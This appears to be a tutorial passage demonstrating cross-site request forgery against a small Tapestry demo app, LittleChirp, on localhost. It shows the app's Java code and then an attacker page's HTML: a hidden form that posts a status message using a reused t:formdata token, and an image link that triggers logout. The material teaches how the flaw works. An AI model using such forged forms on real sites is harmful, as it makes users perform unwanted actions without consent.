To demonstrate the CSRF vulnerability I have created a simple app called LittleChirp that allows to post a small status message for a logged in user.
The tapestry app behind is simple:
The Index.java and Index.tml files contain the Java class and the page template for the home page.
public class Index
{
@SessionState
@Property
private AuthenticationState auth;
@Property
private String username = "TestUser";
@Property
private String password = "Secret";
@InjectPage
private Status status;
@Log
private Object onSuccess(){
auth.setLoggedIn(true);
return status;
}
}
The status page puts the posted statusMessage into a History objects that acts as a wrapper for the status history and is stored in the session.
public class Status{
@Property
private String statusMessage;
@SessionState(create=true)
@Property
private History history;
@Log
private Object onSuccess(){
history.getHistory().add(statusMessage);
return this;
}
@SessionState
private AuthenticationState auth;
@InjectPage
private Index home;
@Log
private Object onActivate(){
if(!auth.isLoggedIn()){
return home;
}
return null;
}
}
If the user is not logged in a redirect to the home page is done. The Layout component contains the functionality to logout a user, which is included at each page that uses the layout.
@InjectPage
private Index home;
@Inject
private Request request;
@Log
public Object onActionFromLogout(){
auth.setLoggedIn(false);
request.getSession(false).invalidate();
return home;
}
}
The attack site, which demonstrates the CSRF vulnerability contains two attacks.
Post request:
<form action="http://localhost:8080/victimapp/status.statusform" method="post">
<input type="hidden" name="statusMessage" value="My evil message, that maybe contains also some bad javascript code."/>
<input type="hidden" name="t:formdata" value="H4sIAAAAAAAAAFvzloG1XIxBJLgksaS02KoYTOWmFhcnpqcWFzGY5hel6yUWJCZnpOqVJBakFpcUVZrqJecXpeZkJuklJRan6jkmAQUTk0vcMlNzUlSCU0tKC1RDD3M/FD3+h4mB0YeBOzk/r6QoP8cvMTe1hEHIJyuxLFE/JzEvXT+4pCgzL926oqCEgRdisS/EYjwOciTVQQFF+clA3cGlSbmZxcWZ+XmH16WYpH2bd46JgaGiAAAF4Kgw/wAAAA==">
<input type="submit" value="Go"/>
</form>
If the "Go" button is pressed a status message update is sent to LittleChirp. This works if the user is currently logged in in the same browser. The t:formdata paramater is a token that is the same for all users and session and will only change if the component structure of the page is changed, it is no protection against CSRF.
GET request:
<a href="http://localhost:8080/victimapp/index.layout.logout"><img src="res/money.jpg" style="width:200px"/></a>
If the user can be tricked to click on the second image, the logout action of LittleChirp is executed. In this case it is not a big problem but on other sites some bigger functionality can behind such action links.